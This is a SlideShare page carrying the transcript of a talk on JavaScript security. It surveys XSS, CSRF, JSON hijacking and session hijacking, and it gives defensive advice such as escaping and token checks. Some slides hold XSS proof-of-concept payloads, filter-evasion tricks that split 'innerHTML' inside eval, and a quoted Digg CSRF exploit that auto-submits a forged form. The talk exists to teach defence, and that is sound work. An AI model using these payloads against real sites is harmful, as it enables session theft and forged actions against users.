• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
JavaScript Security
 

JavaScript Security

on

  • 18,430 views

JavaScript, as it is today, is an insecure language. We need to understand it's shortcomings to improve the security of our applications to protect our users.

JavaScript, as it is today, is an insecure language. We need to understand it's shortcomings to improve the security of our applications to protect our users.

Statistics

Views

Total Views
18,430
Views on SlideShare
17,939
Embed Views
491

Actions

Likes
15
Downloads
455
Comments
0

11 Embeds 491

http://www.nearinfinity.com 388
http://www.slideshare.net 40
http://localhost 25
http://www.nofluffjuststuff.com 14
https://www.altamiracorp.com 7
http://nearinfinity.com 6
http://translate.googleusercontent.com 4
http://static.slideshare.net 3
http://server1.webkicks.de 2
http://www.feedhaus.com 1
http://www.therichwebexperience.com 1
More...

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    JavaScript Security JavaScript Security Presentation Transcript

    • JavaScript Security jason harwig
    • quot;How dangerous could this silly little toy scripting language running inside a browser be?quot; Jeff Atwood codinghorror.com stackoverflow.com
    • “JavaScript's biggest weakness is that it is not secure.” douglas crockford
    • quot;.. nine out of 10 websites still have serious vulnerabilities. . (XSS) as the top vulnerability classquot; WhiteHat Security Website Security Statistic Report
    • OWASP Top 10 2007 1. XSS 6. Information Leakage 2. Injection Flaws 7. Broken Auth 3. File Exec 8. Insecure Crypto 4. Direct Object 9. Insecure Reference Communications 5. CSRF 10.Failure to restrict URL access
    • browser limitations
    • javascript IO • Ajax • Image • iFrame • Source script • Bridge to flash, Java applets
    • var xhr = new XmlHttpRequest(); xhr.open(...)
    • NIC Server Google * get or post
    • var image = new Image(); image.src = url; * can detect connection success failure
    • NIC Server Google * get requests only | onload | onerror
    • f = document.createElement('iframe'); f.src = url; document.body.appendChild(f); * only if same domain
    • NIC Server Google * get requests only
    • s = document.createElement('script'); s.type = 'text/javascript'; s.src= url; document.body.appendChild(s); * if JSON returned
    • NIC Server Google * get requests only
    • f = document.createElement('form'); f.method = 'post'; ... f.submit();
    • NIC Server Google * get or post
    • white hat • Mashup / Aggregate content • SSO Solutions • Protect users / application integrity
    • black hat • XSS • CSRF • JSON hi-jacking • Cookie session hijacking • Internal network scanning • History checking
    • cross-site scripting
    • Browser IFrame same origin policy
    • user input escape it!
    • XSS Flavors • Type 0 - DOM • Type 1 - Non-Persistant • Type 2 - Persistant
    • type 0 var p = location.href.params; document.body.innerHTML = p
    • Type 1 Search: <script>alert('xss');</script>
    • Type 2 Please enter username: <script>alert('xss');</script>
    • <c:out value=quot;${var}quot; Your Username: <script>alert('xss');</script> escapeXml=quot;truequot;/>
    • html filtering
    • samy is my hero from http://fast.info/myspace/
    • Friend Requests 7,000 5,250 3,500 1,750 0 12:34pm 1:30am 8:35am 9:30am 10:30am 1:30pm
    • tag/attribute whitelist <div style=quot;background:url( 'javascript:alert('xss')' )quot;>
    • 'javascript' stripped <div style=quot;background:url( 'javanscript:alert('xss')' )quot;>
    • quot; stripped String.fromCharCode(34);
    • innerHTML stripped eval('document.body.inne' + 'rHTML');
    • onreadystatechange stripped eval('xmlhttp.onread' + 'ystatechange = callback');
    • to be continued..
    • alternatives to escaping?
    • google caja / ADsafe
    • attack vectors to prevent?
    • code evaluation eval('alert(document.cookie)'); (new Function('alert(document.cookie)'))();
    • code eval continued <iframe src=quot;java&#65533;script:alert('xss')quot;> </iframe>
    • poluting global objects try { throw EvilArrayFunction; } catch (Array) { }
    • xss lessons • Escape XML
    • cross site request forgery the new kid
    • NIC Server Google
    • Digg.com • “digg” a story while logged in • Cookie authentication • known url, parameters
    • digg exploit code mf = window.frames[quot;myframequot;]; html = '<form name=quot;diggformquot; action=quot;http://digg.com/diginfullquot; method=quot;postquot;>'; html = html+'<input type=quot;textquot; name=quot;idquot; value=quot;367034quot;/>'; html = html+'<input type=quot;textquot; name=quot;orderchangequot; value=quot;2quot;/>'; html = html+'<input type=quot;textquot; name=quot;categoryquot; value=quot;0quot;/>'; html = html+'<input type=quot;textquot; name=quot;pagequot; value=quot;0quot;/>'; html = html+'<input type=quot;textquot; name=quot;tquot; value=quot;undefinedquot;/>'; html = html+'<input type=quot;textquot; name=quot;rowquot; value=quot;1quot;/>'; html = html+'</form>'; mf.document.body.innerHTML = html; mf.document.diggform.submit(); from http://4diggers.blogspot.com/
    • Fixes? • Referral checking? • quick cookie expiration? • post?
    • solved session.setAttribute(quot;tokenquot;, token); <input type=quot;hiddenquot; value=quot;${token}quot;/>
    • double submit cookie
    • digg link <a href=quot;javascript:dig([num],[id],[digCheck])quot;>digg it</a>
    • digg submit js new Ajax.Request(quot;/diginfullquot;, { quot;methodquot;: quot;postquot;, quot;parametersquot;: quot;id=quot; + itemd + quot;&row=quot; + row + quot;&digcheck=quot; + digcheck + quot;&type=quot; + type + quot;&loc=quot; + pagetype });
    • no diggcheck, no digg
    • digg.com • Added random hash as post parameter • server verifies request
    • myspace • used hash in post to add friends • XSS vulnerable so the hash could be retrieved
    • HDIV • HTTP Data Integrity Validator
    • rsnake joins twitter
    • crossdomain.xml <?xml version=quot;1.0quot; encoding=quot;UTF-8quot;?> <cross-domain-policy xmlns:xsi=quot;http://www.w3.org/2001/ XMLSchema-instancequot; xsi:noNamespaceSchemaLocation=quot;http:// www.adobe.com/xml/schemas/PolicyFile.xsdquot;> <allow-access-from domain=quot;*.twitter.comquot; /> <site-control permitted-cross-domain-policies=quot;master-onlyquot;/> <allow-http-request-headers-from domain=quot;*.twitter.comquot; headers=quot;*quot; secure=quot;truequot;/> </cross-domain-policy>
    • http://www.yourminis.com/search_minis.aspx?q=XSS
    • stealing your gmail contacts
    • google contacts url contacts?out=js&callback=google
    • responseText google ({ Success: true, Errors: [], Body: { Contacts: [ { id, email, etc. } ] } });
    • google’s solution? • responseXml
    • lessons • Protect high value forms • CANNOT be stopped if site is vulnerable to XSS
    • json hijacking
    • new Ajax.Request('secretStuff', { onSuccess: doWork }); // server responds with [ { sensitive_info: '...' }, { sensitive_info: '...' } ]
    • So how do I do it? • Override Array • Source script
    • demo
    • solved /*-secure- [ { sensitive_info: '...' }, { sensitive_info: '...' } ] */
    • “solved” continued • protect JSON services behind post
    • lessons • Many experts recommend JSON services shouldn’t serve sensitive data • use secure comment • responseXml as alternative
    • Session hijacking
    • demo
    • internal network penetration
    • history hijack
    • demo
    • resources quot;Security Now! Podcastquot; quot;Fortifyquot; twit.tv/sn fortifysoftware.com/security- resources/ quot;WhiteHat Securityquot; whitehatsec.com quot;XSS Generatorquot; ha.ckers.org/xss.html quot;Jeremiah Grossman Blogquot; jeremiahgrossman.blogspot.com quot;Samy is my Heroquot; fast.info/myspace quot;Digg Hackquot; 4diggers.blogspot.com quot;HDIVquot; hdiv.org
    • twitter: jharwig jason.harwig@nearinfinity.com nearinfinity.com/blogs careers@nearinfinity.com 81